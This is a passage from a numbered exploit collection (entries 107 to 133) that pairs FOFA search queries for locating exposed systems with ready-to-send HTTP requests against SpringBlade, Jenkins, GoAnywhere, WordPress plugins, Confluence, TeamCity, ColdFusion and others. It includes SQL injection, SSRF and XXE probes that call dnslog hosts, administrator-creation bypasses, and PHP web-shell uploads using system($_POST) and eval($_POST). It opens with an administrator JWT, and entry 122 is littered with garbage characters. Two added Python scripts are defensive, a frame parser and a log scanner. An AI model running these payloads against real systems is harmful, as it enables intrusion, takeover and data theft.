User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA: body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA: "dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA: header="X-Jenkins"
The plain CLI endpoint is driven by two requests that share one Session id: the "upload" side carries the command frames, the "download" side receives the output. An argument that starts with @ is expanded by the args4j parser into the contents of that file on the controller, which is what leaks /etc/passwd into the command's error text.

POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

(The body is written as a Python bytes literal; the raw bytes it denotes are 57 in total, and Content-Length must match what is actually sent.)

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Response on the download side. The first line of the file becomes the COMMAND argument and is echoed as its "default", the following lines are rejected as extra arguments:
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
 [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

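An added Python example, written for this edit and not taken from the original write-up or from the Jenkins project, that builds and parses the framing used in the upload body above. The frame layout and opcode numbers are read off those bytes rather than from Jenkins source: a 4-byte big-endian payload length that does not count the opcode byte, a 1-byte opcode, then the payload, with strings encoded like Java writeUTF (2-byte length prefix). Rebuilding the body gives its true length (57 bytes), which is what Content-Length has to be, and the parser lets a responder pull @-prefixed arguments out of a captured request body. Nothing is sent over the network.

```python
"""PlainCLI-style frame builder/parser for the Jenkins CLI request in entry 109 (added example)."""
import struct

# Opcode values as they appear in the POC bytes: 0 = argument, 1 = locale, 2 = encoding, 3 = start
OP_ARG, OP_LOCALE, OP_ENCODING, OP_START = 0, 1, 2, 3


def java_utf(text):
    """Encode a string the way DataOutputStream.writeUTF does: 2-byte length, then the bytes."""
    data = text.encode("utf-8")
    return struct.pack(">H", len(data)) + data


def frame(op, payload=b""):
    """One frame: payload length (the opcode byte is not counted), opcode, payload."""
    return struct.pack(">I", len(payload)) + bytes([op]) + payload


def build_cli_body(args, encoding="GBK", locale="en_US"):
    """Body of the 'Side: upload' request: every argument, then encoding, locale and START."""
    body = b"".join(frame(OP_ARG, java_utf(a)) for a in args)
    body += frame(OP_ENCODING, java_utf(encoding))
    body += frame(OP_LOCALE, java_utf(locale))
    body += frame(OP_START)
    return body


def parse_cli_body(body):
    """Split a captured upload body into (opcode, payload) tuples; raises on a truncated frame."""
    frames, i = [], 0
    while i < len(body):
        if len(body) < i + 5:
            raise ValueError("truncated frame header at offset %d" % i)
        (n,) = struct.unpack(">I", body[i:i + 4])
        op = body[i + 4]
        payload = body[i + 5:i + 5 + n]
        if len(payload) != n:
            raise ValueError("truncated frame payload at offset %d" % i)
        frames.append((op, payload))
        i += 5 + n
    return frames


def cli_args(body):
    """Decode the argument frames of a body, in order."""
    out = []
    for op, payload in parse_cli_body(body):
        if op == OP_ARG:
            (n,) = struct.unpack(">H", payload[:2])
            out.append(payload[2:2 + n].decode("utf-8", "replace"))
    return out


def file_expansion_args(body):
    """Arguments that args4j would expand from a file on the controller: the CVE-2024-23897 indicator."""
    return [a for a in cli_args(body) if a.startswith("@")]


# The exact body from the POC above, as raw bytes.
POC_BODY = (
    b"\x00\x00\x00\x06\x00\x00\x04help"
    b"\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd"
    b"\x00\x00\x00\x05\x02\x00\x03GBK"
    b"\x00\x00\x00\x07\x01\x00\x05en_US"
    b"\x00\x00\x00\x00\x03"
)

if __name__ == "__main__":
    body = build_cli_body(["help", "@/etc/passwd"])
    print("Content-Length:", len(body), "matches POC:", body == POC_BODY)
    print("file-expansion args:", file_expansion_args(POC_BODY))
```

On a controller at Jenkins 2.442 / LTS 2.426.3 or later the @-file expansion is disabled, so the same request returns the help text for a literal "@/etc/passwd" command instead of file contents; a request body with any @-prefixed argument against an older controller is worth alerting on.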
110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA: body="InvalidBrowser.xhtml" || icon_hash="1484947000" || icon_hash="1828756398" || icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The "..;/" segment bypasses the path-based access check and reaches the initial account setup wizard, which creates an administrator.

111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA: "wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA: body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA: "/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA: body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value.
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce and execute the command.
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

The queryEditor value is evaluated as PHP; the command output is returned in the exception message.

116. WordPress js-support-ticket plugin file upload
FOFA: body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

(Each multipart part needs the blank line between its headers and its body; the PHP file content is omitted in the original.)

117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 to 7.10.0
FOFA: body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

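Since this list is offered as a checklist for defenders, here is an added Python example (written for this edit, not the original author's code) that scans web-server access logs for the request shapes used in entries 95, 96, 101, 105 to 107, 109 to 111, 114 and 117 above: updatexml()/sleep() in query strings, the OFBiz requirePasswordChange=Y URLs, the Ivanti keys-status path with a ";" separator, the GoAnywhere "..;/" segment and the Jenkins /cli?remoting=false endpoint. It assumes the common combined log layout and decodes the request target up to three times so encoded payloads surface; the lines in SAMPLE_LOG are constructed for the example, reusing the request lines shown on this page. Payloads carried in POST bodies (the NotificationX JSON in 112, the multipart uploads) never reach an access log and need request-body or WAF logging instead.

```python
"""Access-log scan for the request shapes listed in this section (added example)."""
import re
from collections import Counter
from urllib.parse import unquote_plus

# (rule name, regex applied to the URL-decoded request target)
RULES = [
    ("sqli-updatexml", re.compile(r"updatexml\s*\(", re.I)),                       # SpringBlade 106/107
    ("sqli-sleep", re.compile(r"\bsleep\s*\(\s*\d", re.I)),                          # 111, 114, 117 time-based probes
    ("ofbiz-auth-bypass", re.compile(                                                 # 95/96 pre-auth URLs
        r"/webtools/control/(?:xmlrpc|ProgramExport)\S*requirePasswordChange=Y", re.I)),
    ("ivanti-keys-status-cmdi", re.compile(r"/license/keys-status/[^?]*;", re.I)),   # 101
    ("goanywhere-dotdot-semicolon", re.compile(r"/\.\.;/")),                         # 110
    ("jenkins-cli-plain", re.compile(r"^/cli\?(?:.*&)?remoting=false", re.I)),       # 109
]

# Combined log format: ip ident user [time] "METHOD target HTTP/x" status ...
COMBINED_LOG = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def decode_target(target, rounds=3):
    """URL-decode up to `rounds` times so double-encoded payloads (%2528...) still surface."""
    for _ in range(rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target


def scan_line(line):
    """Return a finding for one log line, or None when the line is unparseable or clean."""
    m = COMBINED_LOG.match(line)
    if not m:
        return None
    decoded = decode_target(m.group("target"))
    rules = [name for name, rx in RULES if rx.search(decoded)]
    if not rules:
        return None
    return {
        "ip": m.group("ip"), "ts": m.group("ts"), "method": m.group("method"),
        "status": int(m.group("status")), "target": decoded, "rules": rules,
    }


def scan(lines):
    """Findings for every matching line, in log order."""
    return [f for f in map(scan_line, lines) if f]


def by_source(findings):
    """Findings per source IP, the usual first pivot when triaging."""
    return Counter(f["ip"] for f in findings)


# Constructed sample lines; the request targets are the ones from the POCs above.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Feb/2024:10:01:02 +0800] "GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1" 500 213',
    '10.0.0.5 - - [10/Feb/2024:10:01:09 +0800] "GET /?rest_route=/h5vp/v1/view/1&id=1%27+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1" 200 40',
    '10.0.0.6 - - [10/Feb/2024:10:02:00 +0800] "GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1" 403 0',
    '10.0.0.7 - - [10/Feb/2024:10:02:30 +0800] "GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1" 200 8812',
    '10.0.0.8 - - [10/Feb/2024:10:03:00 +0800] "POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Feb/2024:10:03:10 +0800] "POST /cli?remoting=false HTTP/1.1" 200 0',
    '10.0.0.9 - - [10/Feb/2024:10:03:11 +0800] "GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id=42 HTTP/1.1" 200 77',
    '10.0.0.9 - - [10/Feb/2024:10:03:12 +0800] "GET /index.php?q=sleepy HTTP/1.1" 200 77',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ip"], f["method"], ",".join(f["rules"]), f["target"])
```

The status code is kept in each finding on purpose: a 200 on the GoAnywhere wizard path or on the OFBiz ProgramExport URL is a much stronger signal than a 403, and the time-based SQL probes are best confirmed by comparing response times for the same source in the log's duration field where one is available.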
118. Byzoro (北京百绰智能) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA: title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

The txt_path field chooses where the file is written; then access /home/src.php.

119. Byzoro (北京百绰智能) Smart S20 management platform sysmanageajax.php SQL injection (after login)
CVE-2024-1254
FOFA: title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

The id parameter is injected; a 5-second delay when the database name is 3 characters long confirms it.

120. Byzoro (北京百绰智能) Smart S40 management platform web.php import arbitrary file upload
CVE-2024-1253
FOFA: title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

Uploaded file path: /upload/2.php

121. Byzoro (北京百绰智能) Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA: title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--

Uploaded file location: boot/web/upload/weblogo/1.php

7 A4 Z( H/ P( A' j122. 北京百绰智能s200管理平台/importexport.php sql注入3 e& ]4 t6 Y- O" M5 R) |3 ]
CVE-2024-27718FOFA:title="Smart管理平台"" |. b; T) ~. G. c2 D @9 i
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()& u8 o" V/ s7 H1 M6 Q! h0 I
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.17 k$ ^7 T z- F' }4 F" H
Host: x.x.x.x, O4 i2 b: u+ C; {. @) ?9 s; O; P
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc06 G8 G, N6 ~+ a z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0% u+ n) g3 o9 _( j, p+ K9 I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ |: e5 D' c8 ~6 bAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! h- y1 h7 o. \3 ]
Accept-Encoding: gzip, deflate, br
: o" F& J% W( D: ^, h* C6 CUpgrade-Insecure-Requests: 11 O6 f( J6 Q0 M3 F* z1 A
Sec-Fetch-Dest: document
1 P4 G; ]; e! \" c8 RSec-Fetch-Mode: navigate1 v6 B2 o. Z* k# j/ K: l
Sec-Fetch-Site: none
8 w8 Y3 Y2 f' R( PSec-Fetch-User: ?1
8 K8 I4 v/ g7 c$ z8 PTe: trailers
9 s) u; r+ r6 C4 CConnection: close
' z" h: O1 H! B1 O H! y7 U
# O" t# }2 P- q- i
123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. 湖南建研 engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

Uploaded file: http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user has been created, log in to the admin backend directly; system commands can then be executed from there.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. 广联达 Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 cloud mall file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
